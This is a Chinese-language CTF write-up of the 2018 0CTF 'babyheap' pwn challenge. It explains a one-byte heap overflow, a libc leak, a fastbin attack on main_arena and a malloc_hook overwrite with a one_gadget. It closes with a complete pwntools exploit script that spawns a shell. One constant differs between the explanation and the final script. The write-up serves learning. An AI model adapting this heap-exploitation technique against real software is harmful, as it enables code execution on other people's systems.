pwn萌新的一次体验-0ctf-babyheap

写在前面

由于我有了新欢忘了旧爱，在自己web还处于菜鸡的情况下，去学了pwn。在自己菜菜的技术前提下，大胆尝试了下0ctf的一道pwn，写此文，纪念自己菜菜的pwn体验

题目

题目是2018 0ctf的babyheap，64位，不是一道难题，但是也让我这个菜pwn写了很久。

漏洞

这个题就是一个洞：
这里允许一个字节的溢出，于是就可以覆盖到下一个chunk的size。
首先，我们要先leak出地址。这里由于题目分配内存使用的是calloc，这样会在分配内存时，将内存清零，所以，我们不能直接得到地址。于是我们必须换思路。

leak

这里，我们先申请0x18的chunk，得到的是size为0x20的chunk，然后再申请两小的chunk（比如0x30），然后我们利用第一个chunk的一字节溢出，修改下一个chunk的size大一点，能包括下一个chunk的内容，（比如修改为0x60），然后，再free这个修改过的chunk，（当然，需要构造在这个chunk加0x60处的size的p位为1，来应对free的检查）之后我们再申请回这个chunk，（当然申请0x50）然后我们就能利用这个chunk，view到下一个chunk的内容了，如果下一个chunk的pd和bk有值就能看了。这是leak的思路。我想leak出libc的地址来着，但是，我们申请chunk的最大大小是0x58：

于是，我们还要使用一个字节的溢出使得这个chunk的size满足进入unsortbin的标准，于是，我们做这些操作：（比较繁琐，本人萌新）

new(0x18)#0
new(0x18)#1
new(0x40)#2 #40
new(0x20)#3 #90
new(0x40)#4 #c0
update(0,0x19,0x19*'\x61')
update(1,0x10,p64(0)+p64(0x91))
update(2,0x40,8*p64(0x91))
dele(1)#1
new(0x50)#1 20
update(1,0x30,6*p64(0x91))
update(4,0x40,4*(p64(0x0) + p64(0x21)))
dele(2)#2  40
view(1)
p.recv(0x2a)#2a
a = p.recv(8)
main_ar = u64(a)
success(hex(u64(a)))
libcc = u64(a) - 0x3c4b78
success(hex(libcc))

首先申请2个能溢出的chunk，0号用来改1号的size，1号改2号size，还有看2号的fd，于是，然后我们需要一个size能进unsortbin的chunk，于是我申请了3个chunk，主要是为了修改完毕2的size为0x91之后，使得chunk2之后0x90的值处size位的p位为1。
于是这样我们就得到了chunk2的fd，得到libc基址：

fastbin attack

然后我们打算fastbin attack，但是pie使得无法写got表，那么我们就写malloc_hook，这着实让我这个萌新满头雾水，因为我在malloc_hook上没找到符合格式的size，然后尝试了一种新思路，就是改写main_arena上的top_chunk的地址，这样，我们申请内存时，就可以得到malloc_hook上面的地址，然后对malloc_hook的值进行任意写了。
于是我先把unsortbin清空（因为我比较菜，害怕之后申请chunk会乱）。然后，由于在fastbin attack的时候需要符合size的检查，于是，我先在main_arena上布size，这时，我们可以利用main_arena记录fastbin的链，我们把fd设置成size

#--free to fastbins
update(5,0x10,2*(p64(0)+p64(0x31)))
update(1,0x50,10*(p64(0)+p64(0x51)))
dele(2)#2

#--change mainarena
des_addr = main_ar - 0x40
a = p64(0) + p64(0x51) + p64(0) + p64(0x51) + p64(0x41) + p64(0x51)
update(1,len(a),a)
new(0x40)#2 40

于是这里main_arena上就有0x41了：

然后申请掉这个fastbin：

然后愉快fastbin attack
然后改掉topchunk

#--change topchunk
new(0x30)#8
new(0x38)#9
payload = p64(0)*6 + p64(des_addr-56)
update(9,len(payload),payload)

然后再申请空间就能从topchunk中申请，写到malloc_hook了，利用onegadget，再次calloc就能getshell了

exp

#!/usr/bin/env python
# coding=utf-8
from pwn import *

context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
p = process('./babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def new(size):
    p.recvuntil('Command: ')
    p.sendline('1')
    p.recvuntil('Size: ')
    p.sendline(str(size))

def dele(index):
    p.recvuntil('Command: ')
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline(str(index))

def update(index,size,context):
    p.recvuntil('Command: ')
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(index))
    p.recvuntil('Size: ')
    p.sendline(str(size))
    p.recvuntil('Content: ')
    p.sendline(context)

def view(index):
    p.recvuntil('Command: ')
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(index))

#---leak libc
new(0x18)#0
new(0x18)#1
new(0x40)#2 #40
new(0x20)#3 #90
new(0x40)#4 #c0
update(0,0x19,0x19*'\x61')
update(1,0x10,p64(0)+p64(0x91))
update(2,0x40,8*p64(0x91))
dele(1)#1
new(0x50)#1 20
update(1,0x30,6*p64(0x91))
update(4,0x40,4*(p64(0x0) + p64(0x21)))
dele(2)#2  40
view(1)
p.recv(0x2a)#2a
a = p.recv(8)
main_ar = u64(a)
success(hex(u64(a)))
libcc = u64(a) - 0x3c4b78
success(hex(libcc))

#--calloc unsortbin
new(0x30)#2 40
new(0x40)#5 90
#--free to fastbins
update(5,0x10,2*(p64(0)+p64(0x31)))
update(1,0x50,10*(p64(0)+p64(0x51)))
dele(2)#2

#--change mainarena
des_addr = main_ar - 0x40
a = p64(0) + p64(0x51) + p64(0) + p64(0x51) + p64(0x41) + p64(51)
update(1,len(a),a)
new(0x40)#2 40

#--fastbin attack
new(0x18)#6  
new(0x18)#7 130
new(0x30)#8 150
update(6,0x19,0x19*'\x41')
update(8,0x30,6*(p64(0)+ p64(0x21)))
dele(7)
new(0x30)#7 130
b= p64(0)+p64(0) + p64(0) + p64(0x41) + p64(des_addr)+p64(0)
update(7,len(b),b)
dele(8)
update(7,len(b),b)

#--change topchunk
new(0x30)#8
new(0x38)#9
payload = p64(0)*6 + p64(des_addr-56)
update(9,len(payload),payload)
#--change mallloc hook
new(0x18)#10
payload2 = libcc + 0x4526a
update(10,len(p64(payload2)),p64(payload2))
new(1)

p.interactive()